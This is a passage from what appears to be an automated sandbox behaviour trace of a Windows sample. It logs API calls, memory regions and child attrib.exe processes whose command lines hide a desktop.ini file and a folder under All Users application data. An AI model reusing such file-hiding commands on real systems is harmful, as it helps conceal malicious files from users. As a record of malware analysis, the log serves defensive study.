returned 1 [0127.150] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.150] GetFileType (hFile=0x4c) returned 0x1 [0127.150] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.150] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cee28*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.150] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.150] GetFileType (hFile=0x4c) returned 0x1 [0127.150] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.150] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cee78*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.150] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.150] GetFileType (hFile=0x4c) returned 0x1 [0127.150] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.150] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceec8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1ceec8*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.150] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.150] GetFileType (hFile=0x4c) returned 0x1 [0127.150] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.150] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cef18*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.150] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.150] GetFileType (hFile=0x4c) returned 0x1 [0127.150] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.150] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cef68*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.150] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.150] GetFileType (hFile=0x4c) returned 0x1 [0127.150] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.150] WriteFile (in: hFile=0x4c, lpBuffer=0x1cefb8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cefb8*, lpNumberOfBytesWritten=0x1cdfbc*=0x20, lpOverlapped=0x0) returned 1 [0127.151] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.151] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdfa8 | out: lpNewFilePointer=0x0) returned 1 [0127.151] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.151] ReadFile (in: hFile=0x54, lpBuffer=0x1cedd8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdfc8, lpOverlapped=0x0 | out: lpBuffer=0x1cedd8*, lpNumberOfBytesRead=0x1cdfc8*=0x200, lpOverlapped=0x0) returned 1 [0127.151] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.151] GetFileType (hFile=0x4c) returned 0x1 [0127.151] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.151] GetFileType (hFile=0x4c) returned 0x1 [0127.151] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.151] WriteFile (in: hFile=0x4c, lpBuffer=0x1cedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cedd8*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.151] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.151] GetFileType (hFile=0x4c) returned 0x1 [0127.151] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.151] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cee28*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.151] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.151] GetFileType (hFile=0x4c) returned 0x1 [0127.151] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.151] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cee78*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.151] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.151] GetFileType (hFile=0x4c) returned 0x1 [0127.151] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.151] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceec8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1ceec8*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.151] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.151] GetFileType (hFile=0x4c) returned 0x1 [0127.151] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.151] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cef18*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.152] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.152] GetFileType (hFile=0x4c) returned 0x1 [0127.152] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.152] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cef68*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.152] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.152] GetFileType (hFile=0x4c) returned 0x1 [0127.152] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.152] WriteFile (in: hFile=0x4c, lpBuffer=0x1cefb8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cefb8*, lpNumberOfBytesWritten=0x1cdfbc*=0x20, lpOverlapped=0x0) returned 1 [0127.152] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.152] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdfa8 | out: lpNewFilePointer=0x0) returned 1 [0127.152] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.152] ReadFile (in: hFile=0x54, lpBuffer=0x1cedd8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdfc8, lpOverlapped=0x0 | out: lpBuffer=0x1cedd8*, lpNumberOfBytesRead=0x1cdfc8*=0x32, lpOverlapped=0x0) returned 1 [0127.152] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.152] GetFileType (hFile=0x4c) returned 0x1 [0127.152] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.152] GetFileType (hFile=0x4c) returned 0x1 [0127.152] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.152] WriteFile (in: hFile=0x4c, lpBuffer=0x1cedd8*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cedd8*, lpNumberOfBytesWritten=0x1cdfbc*=0x32, lpOverlapped=0x0) returned 1 [0127.152] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.152] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdfa8 | out: lpNewFilePointer=0x0) returned 1 [0127.152] _close (_FileHandle=4) returned 0 [0127.152] FindNextFileW (in: hFindFile=0x300e90, lpFindFileData=0x1cf03c | out: lpFindFileData=0x1cf03c) returned 0 [0127.153] GetLastError () returned 0x12 [0127.153] FindClose (in: hFindFile=0x300e90 | out: hFindFile=0x300e90) returned 1 [0127.153] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0127.154] _close (_FileHandle=3) returned 0 [0127.154] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.154] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0127.154] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.154] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0127.154] _get_osfhandle (_FileHandle=0) returned 0x3 [0127.155] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0127.155] SetConsoleInputExeNameW () returned 0x1 [0127.155] GetConsoleOutputCP () returned 0x1b5 [0127.155] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0127.155] SetThreadUILanguage (LangId=0x0) returned 0x409 [0127.155] exit (_Code=0) Process: id = "77" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16640" os_pid = "0xff4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "75" os_parent_pid = "0xfcc" cmd_line = "attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10145 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10146 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10147 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10148 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 10149 start_va = 0xad0000 end_va = 0xad6fff entry_point = 0xad0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 10150 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10151 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10152 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 10153 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 10154 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 10155 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10156 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10157 start_va = 0xb0000 end_va = 0x116fff entry_point = 0xb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10158 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 10159 start_va = 0x370000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 10160 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 10161 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10162 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10163 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 10164 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10165 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 10166 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10167 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 10168 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 10169 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10170 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 10171 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 10172 start_va = 0x230000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 10173 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 10174 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 134 os_tid = 0xff8 Process: id = "78" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16640" os_pid = "0xffc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "75" os_parent_pid = "0xfcc" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10291 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10292 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10293 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10294 start_va = 0x1b0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 10295 start_va = 0x8a0000 end_va = 0x8a6fff entry_point = 0x8a0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 10296 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10297 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10298 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 10299 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 10300 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 10301 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10302 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10303 start_va = 0x80000 end_va = 0x17ffff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 10304 start_va = 0x1f0000 end_va = 0x256fff entry_point = 0x1f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10305 start_va = 0x3e0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 10306 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 10307 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10308 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10309 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 10310 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10311 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 10312 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10313 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 10314 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 10315 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10316 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 10317 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 10318 start_va = 0x260000 end_va = 0x327fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 10319 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 10320 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 135 os_tid = 0x3c4 Process: id = "79" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16780" os_pid = "0x80c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "75" os_parent_pid = "0xfcc" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10321 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10322 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10323 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10324 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 10325 start_va = 0x6a0000 end_va = 0x6a6fff entry_point = 0x6a0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 10326 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10327 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10328 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 10329 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 10330 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 10331 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10332 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10333 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10334 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 10335 start_va = 0x460000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 10336 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 10337 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10338 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10339 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 10340 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10341 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 10342 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10343 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 10344 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 10345 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10346 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 10347 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 10348 start_va = 0x100000 end_va = 0x1c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 10349 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 10350 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 136 os_tid = 